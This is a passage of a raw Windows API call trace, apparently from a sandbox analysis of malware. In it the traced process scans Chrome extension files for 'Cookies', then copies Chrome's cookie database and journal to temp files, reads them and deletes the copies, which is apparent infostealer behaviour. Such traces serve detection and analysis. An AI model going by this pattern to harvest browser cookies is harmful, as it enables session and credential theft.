HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json", lpSrch="Cookies") returned 0x0 [0163.545] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json", lpSrch="Cookies") returned 0x0 [0163.545] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.545] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json", lpSrch="Cookies") returned 0x0 [0163.545] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.545] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json", lpSrch="Cookies") returned 0x0 [0163.546] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json", lpSrch="Cookies") returned 0x0 [0163.546] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json", lpSrch="Cookies") returned 0x0 [0163.546] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json", lpSrch="Cookies") returned 0x0 [0163.546] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json", lpSrch="Cookies") returned 0x0 [0163.546] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.547] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.547] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json", lpSrch="Cookies") returned 0x0 [0163.548] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json", lpSrch="Cookies") returned 0x0 [0163.549] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.549] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json", lpSrch="Cookies") returned 0x0 [0163.549] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.549] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json", lpSrch="Cookies") returned 0x0 [0163.549] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json", lpSrch="Cookies") returned 0x0 [0163.550] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json", lpSrch="Cookies") returned 0x0 [0163.550] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png", lpSrch="Cookies") returned 0x0 [0163.550] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png", lpSrch="Cookies") returned 0x0 [0163.550] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html", lpSrch="Cookies") returned 0x0 [0163.550] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js", lpSrch="Cookies") returned 0x0 [0163.550] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json", lpSrch="Cookies") returned 0x0 [0163.551] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json", lpSrch="Cookies") returned 0x0 [0163.551] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json", lpSrch="Cookies") returned 0x0 [0163.551] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json", lpSrch="Cookies") returned 0x0 [0163.552] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json", lpSrch="Cookies") returned 0x0 [0163.552] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json", lpSrch="Cookies") returned 0x0 [0163.552] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json", lpSrch="Cookies") returned 0x0 [0163.552] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json", lpSrch="Cookies") returned 0x0 [0163.552] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json", lpSrch="Cookies") returned 0x0 [0163.553] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json", lpSrch="Cookies") returned 0x0 [0163.553] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json", lpSrch="Cookies") returned 0x0 [0163.553] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json", lpSrch="Cookies") returned 0x0 [0163.553] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json", lpSrch="Cookies") returned 0x0 [0163.553] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.554] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json", lpSrch="Cookies") returned 0x0 [0163.554] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.554] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json", lpSrch="Cookies") returned 0x0 [0163.554] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.554] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json", lpSrch="Cookies") returned 0x0 [0163.555] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json", lpSrch="Cookies") returned 0x0 [0163.555] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json", lpSrch="Cookies") returned 0x0 [0163.555] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json", lpSrch="Cookies") returned 0x0 [0163.555] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json", lpSrch="Cookies") returned 0x0 [0163.555] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json", lpSrch="Cookies") returned 0x0 [0163.555] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json", lpSrch="Cookies") returned 0x0 [0163.556] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json", lpSrch="Cookies") returned 0x0 [0163.556] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.556] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json", lpSrch="Cookies") returned 0x0 [0163.556] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.556] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json", lpSrch="Cookies") returned 0x0 [0163.557] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json", lpSrch="Cookies") returned 0x0 [0163.557] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json", lpSrch="Cookies") returned 0x0 [0163.557] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json", lpSrch="Cookies") returned 0x0 [0163.557] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json", lpSrch="Cookies") returned 0x0 [0163.557] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.558] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.558] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json", lpSrch="Cookies") returned 0x0 [0163.558] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json", lpSrch="Cookies") returned 0x0 [0163.558] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.558] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json", lpSrch="Cookies") returned 0x0 [0163.559] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.699] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x925360, Length=0xb2) returned 0x1ea835d7 [0163.758] GetTempFileNameW (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x925420 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7208.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7208.tmp")) returned 0x7208 [0163.759] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7208.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7208.tmp")) returned 1 [0163.759] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies"), lpNewFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7208.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7208.tmp"), bFailIfExists=0) returned 1 [0163.763] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x28) returned 0x394b848 [0163.763] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x28 [0163.763] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x392a5e0 [0163.764] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x54 [0163.764] LockFileEx (in: hFile=0x160, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2dea20 | out: lpOverlapped=0x2dea20) returned 1 [0163.764] LockFileEx (in: hFile=0x160, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2dea14 | out: lpOverlapped=0x2dea14) returned 1 [0163.764] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2dea24 | out: lpOverlapped=0x2dea24) returned 1 [0163.764] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0163.764] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6c) returned 0x3929b20 [0163.764] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x6c [0163.764] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5c80) returned 0x395c8b0 [0163.764] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0x5c80 [0163.764] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0x5c80 [0163.764] ReadFile (in: hFile=0x160, lpBuffer=0x3962090, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x2dea3c, lpOverlapped=0x2dea1c | out: lpBuffer=0x3962090*, lpNumberOfBytesRead=0x2dea3c*=0x400, lpOverlapped=0x2dea1c) returned 1 [0163.764] _aulldvrm () returned 0x0 [0163.765] _aulldvrm () returned 0x0 [0163.765] _aulldvrm () returned 0x0 [0163.765] _aulldvrm () returned 0x0 [0163.765] _aulldvrm () returned 0x0 [0163.765] _aulldvrm () returned 0x0 [0163.765] _aulldvrm () returned 0x0 [0163.765] _aulldvrm () returned 0x0 [0163.765] _aulldvrm () returned 0x0 [0163.765] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2de6f8 | out: lpOverlapped=0x2de6f8) returned 1 [0163.765] LockFileEx (in: hFile=0x160, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2df200 | out: lpOverlapped=0x2df200) returned 1 [0163.765] LockFileEx (in: hFile=0x160, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2df1f4 | out: lpOverlapped=0x2df1f4) returned 1 [0163.765] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2df204 | out: lpOverlapped=0x2df204) returned 1 [0163.765] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0163.765] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6c) returned 0x3949650 [0163.765] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949650) returned 0x6c [0163.765] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2df230 | out: lpOverlapped=0x2df230) returned 1 [0163.767] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7208.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7208.tmp")) returned 1 [0163.768] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x925360, Length=0xc2) returned 0xd50937b5 [0163.768] GetProcessHeap () returned 0x8e0000 [0163.768] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8) returned 0x8fc028 [0163.768] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies-journal"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0163.768] CloseHandle (hObject=0x160) returned 1 [0163.768] GetProcessHeap () returned 0x8e0000 [0163.768] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x925430 [0163.768] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x925430 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0163.768] GetTempFileNameW (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x925430 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7219.tmp")) returned 0x7219 [0163.769] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7219.tmp")) returned 1 [0163.769] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies-journal"), lpNewFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7219.tmp"), bFailIfExists=0) returned 1 [0163.770] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x28) returned 0x394b848 [0163.770] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x28 [0163.770] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xb5) returned 0x394b878 [0163.770] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b878) returned 0xb5 [0163.770] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b878) returned 0xb5 [0163.770] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1d8) returned 0x39297d0 [0163.770] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39297d0) returned 0x1d8 [0163.770] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x43) returned 0x394b938 [0163.770] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b938) returned 0x43 [0163.770] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a888 [0163.770] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a888) returned 0x10 [0163.770] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x43) returned 0x39299b0 [0163.770] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39299b0) returned 0x43 [0163.770] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a870 [0163.770] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a870) returned 0x10 [0163.770] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x42) returned 0x3929a00 [0163.770] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a00) returned 0x42 [0163.770] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a858 [0163.770] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a858) returned 0x10 [0163.770] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2f) returned 0x3929a50 [0163.770] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a50) returned 0x2f [0163.770] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929a88 [0163.770] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a88) returned 0x30 [0163.770] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x3929ac0 [0163.770] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ac0) returned 0x54 [0163.771] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x822) returned 0x3929b20 [0163.771] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, 